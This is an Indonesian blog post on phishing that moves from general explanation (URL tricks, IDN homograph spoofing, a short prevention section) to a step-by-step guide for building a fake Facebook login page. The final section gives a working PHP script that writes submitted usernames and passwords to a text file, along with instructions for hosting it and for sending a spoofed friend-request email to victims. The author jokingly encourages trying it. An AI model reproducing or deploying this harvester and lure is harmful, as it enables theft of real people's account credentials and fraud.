Kamis, 01 Desember 2011

Cara Membuat Link Manipulasi


Membuat Link manipulasi


Sebagian besar metode phishing menggunakan beberapa bentuk penipuan teknis yang dirancang untuk membuat link manipulasi dalam e-mail (dan situs web palsu itu mengarah) tampaknya milik organisasi palsu. URL salah eja atau penggunaan subdomain trik umum digunakan oleh phisher. Pada contoh URL berikut, http://www.yourbank.example.com/, tampak seolah-olah URL akan membawa Anda ke bagian contoh dari website yourbank; sebenarnya ini menunjukkan URL ke "yourbank" (yaitu phishing) bagian dari contoh website.

Trik lain yang umum adalah untuk membuat link manipulasi teks ditampilkan  (teks antara tag ) menyarankan tujuan yang handal, ketika link tersebut benar-benar pergi ke situs phisher. Contoh link berikut ini, / / en.wikipedia.org / wiki / Asli, muncul untuk mengarahkan pengguna ke sebuah artikel berjudul "Genuine"; mengklik justru akan membawa pengguna ke artikel berjudul "Deception". Di pojok kiri bawah browser yang paling pengguna dapat melihat pratinjau dan memverifikasi kemana link manipulasi tersebut akan membawa mereka.  Melayang kursor anda ke atas link untuk beberapa detik dapat melakukan hal yang sama, tetapi ini masih dapat diatur oleh phisher.

Masalah lebih lanjut dengan URL yang telah ditemukan dalam penanganan nama domain internasionalisasi (IDN) di browser web, yang mungkin memungkinkan alamat web secara visual identik dengan menyebabkan yang berbeda, yang mungkin berbahaya, website. Meskipun publisitas seputar cacat, yang dikenal sebagai spoofing IDN atau homograf serangan,  phisher telah mengambil keuntungan dari risiko yang sama, dengan menggunakan URL redirectors terbuka pada situs-situs organisasi terpercaya untuk menyamarkan URL berbahaya dengan domain terpercaya. Bahkan sertifikat digital tidak memecahkan masalah ini karena sangat mungkin untuk phisher untuk membeli sebuah sertifikat yang valid dan kemudian mengubah konten untuk spoof situs web asli.

Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini

Cara Melakukan Phising UserID dan Password




Cara Melakukan Phising (penyadapan)



I.
Phising , Ada yang tau tentang Phising ? Yang pasti phising itu adalah 
cara mencoba untuk mendapatkan informasi seperti username, password, dan rincian kartu kredit dengan menyamar sebagai entitas terpercaya dalam sebuah komunikasi elektronik. Komunikasi yang mengaku berasal dari populer situs web sosial, situs lelang, prosesor pembayaran online atau IT administrator biasanya digunakan untuk memikat publik tidak curiga. Phishing biasanya dilakukan melalui e-mail spoofing atau pesan instan, dan sering mengarahkan pengguna untuk memasukkan rincian palsu di website yang tampilan dan nuansa yang hampir sama dengan satu sah. Phishing adalah contoh dari teknik rekayasa sosial yang digunakan untuk menipu pengguna,dan memanfaatkan kegunaan miskin teknologi keamanan web saat ini  Usaha untuk berurusan dengan meningkatnya jumlah insiden phishing yang dilaporkan termasuk legislasi, pelatihan pengguna, kesadaran publik,. dan langkah-langkah keamanan teknis.

Sebuah teknik phishing telah dijelaskan secara rinci pada tahun 1987, dan penggunaan rekaman pertama dari "phishing" istilah dibuat pada tahun 1996. Istilah ini adalah varian dari memancing, mungkin dipengaruhi oleh phreaking, dan menyinggung "umpan" yang digunakan dalam harapan bahwa calon korban akan "menggigit" dengan mengklik link berbahaya atau membuka attachment berbahaya, dalam hal informasi keuangan dan password kemudian dapat dicuri.


Waaaah enak banget ya kalo kita bisa melakukannya,, Tapi tindakan ini merupakan tindakan yang melanggar hukum sobat blogger.... So Cuma sekedar tau aja ya,, kalo di praktekin ??? Hmmm boleh juga sich.. hehehe..
Disini  saya cuma mau skedar Share aja sama kawan kawan blogger, Bagaimana cara kita melakukan penyadapan / Phising
 

Sebagai contoh kecil nya : 
melakukan penipuan kartu kredit atau memandu nasabah untuk melakukan transfer ke rekening tertentu dengan iming-iming hadiah, So hati hati ya sobat blogger jika ada yang mengiming imingi kita dengan hadiah / price / apalah segala jenisnya..

II.
Bagaimana phishing dilakukan?
Teknik yang sering digunakan oleh para penyadap adalah:

* Penggunaan alamat e-mail palsu dan grafik untuk menyesatkan user sehingga user terpancing menerima keabsahan e-mail atau web sites. Agar tampak meyakinkan, pelaku juga seringkali memanfaatkan logo atau merk dagang milik lembaga resmi, seperti; facebook, yahoo, bank atau penerbit lainnya. Pemalsuan ini dilakukan untuk memancing korban menyerahkan data pribadi, seperti; password, PIN dan nomor kartu kredit

* Membuat situs palsu / MANIPULASI LINK yang sama persis dengan situs resmi atau pelaku phishing mengirimkan e-mail yang berisikan link ke situs palsu tersebut.

* Membuat hyperlink ke web-site palsu atau menyediakan form isian yang ditempelkan pada e-mail yang dikirim.



Hmmm banyak juga kan cara nya,, ( Pengalaman Pribadiku dulu ) :D


 
III.
Mencegah agar tidak menjadi korban phishing
Jangan mudah terpancing untuk mengikuti arahan/petunjuk apapun sehubungan informasi data, rekening atau informasi penting lainnya, yang dianjurkan pada e-mail yang dilink ke situs tertentu. Jika Anda menerima e-mail sejenis ini dan mengatasnamakan Lembaga tertentu yang mencurigakan atau ASPAL, berhati-hatilah.


=============================

Cara Membuat Perangkap Penyadapan [Phising]

=============================

1. buka http://www.facebook.com/login.php,
lalu view source. copy dan paste ke notepad.
Cari "action=" (tanpa quote) dan kita akan memulai editingnya.
pada action="https://login.facebook.com/login.php" ubahlah menjadi action="next.php"
kemudian ubah juga methode dari "POST" menjadi "get"

simpan notepad ini menjadi index.php (jangan html)

2. buka notepad baru isikan kode berikut :


Code: Select all
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



--> Simpan sebagai next.php


3. Buka notepad lagi biarkan kosong, lalu simpan dng nama pass.txt.
Upload 3 file tersebut "index.php, next.php, pass.txt" kedalam hosting misalnya 110mb.com, 000webhost.com atau 007sites.com.

OK, Kamu sudah punya phising page facebook sekarang.

4. Langkah-langkah spoofing.
copy content asli undangan pertemanan dari facebook.
edit hyperlink dari : "http:/www.facebook.com/n/?reqs.php"
ganti dengan halaman phising anda, hal ini tidak akan merubah tampilan di content asli facebook tapi tetap mengarah ke halaman phising kamu. Phising siap dikirim ke korban kamu.




Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini